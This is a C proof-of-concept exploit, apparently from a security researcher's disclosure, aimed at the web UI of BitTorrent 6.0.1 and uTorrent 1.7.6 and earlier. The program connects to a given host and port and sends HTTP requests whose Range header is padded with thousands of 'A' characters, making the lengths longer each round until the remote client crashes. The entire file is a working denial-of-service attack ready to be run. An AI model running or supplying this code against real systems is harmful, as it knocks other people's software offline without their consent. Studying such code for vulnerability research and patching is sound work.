/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
    #define sleep   Sleep
    #define sleepms(x)  sleep(x)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define ONESEC  1
    #define sleepms(x)  usleep(x * 1000)
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER     "0.1"
#define BUFFSZ  16000



int putcc(u8 *data, int chr, int len);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            i,
            t;
    u16     port;
    u8      *buff,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "BitTorrent <= 6.0.1 (build 7859) and uTorrent <= 1.7.6 (build 7859)\n"
        "  webui crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <host> <port>\n"
            "\n"
            "the webui port is by default the same used by the client for the bittorrent\n"
            "protocol or 8080 or a custom one chosed by the user\n"
            "\n", argv[0]);
        exit(1);
    }

    host = argv[1];
    port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ + 64);
    if(!buff) std_err();

    printf(
        "- now I start a quick scanning\n"
        "- the remote client should crash before 9100 but the result can vary\n");
    for(i = 9000; i < BUFFSZ; i++) {
        p = buff;
        p += sprintf(p,
            "GET / HTTP/1.0\r\n"
            "Range: ");
        p += putcc(p, 'A', i);
        p += sprintf(p, "\r\n"
            "\r\n");

        printf("%d\r", i);

        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
         < 0) std_err();

        send(sd, buff, p - buff, 0);

        for(len = 0;;) {
            if(timeout(sd, 10) < 0) {
                printf("\n- socket timeout, BitTorrent/uTorrent down?\n");
                break;
            }
            t = recv(sd, buff + len, BUFFSZ - len, 0);
            if(t <= 0) break;
            len += t;
            buff[len] = 0;
            p = strstr(buff, "\r\n\r\n");
            if(p) {
                *p = 0;
                if(memcmp(buff, "HTTP/1.", 7)) {
                    printf("\nError: the remote host doesn't seem to have the webui activated\n");
                    exit(1);
                }
                break;
            }
        }

        close(sd);
        sleepms(500);
    }

    printf("\n- scan terminated without success\n");
    free(buff);
    return(0);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


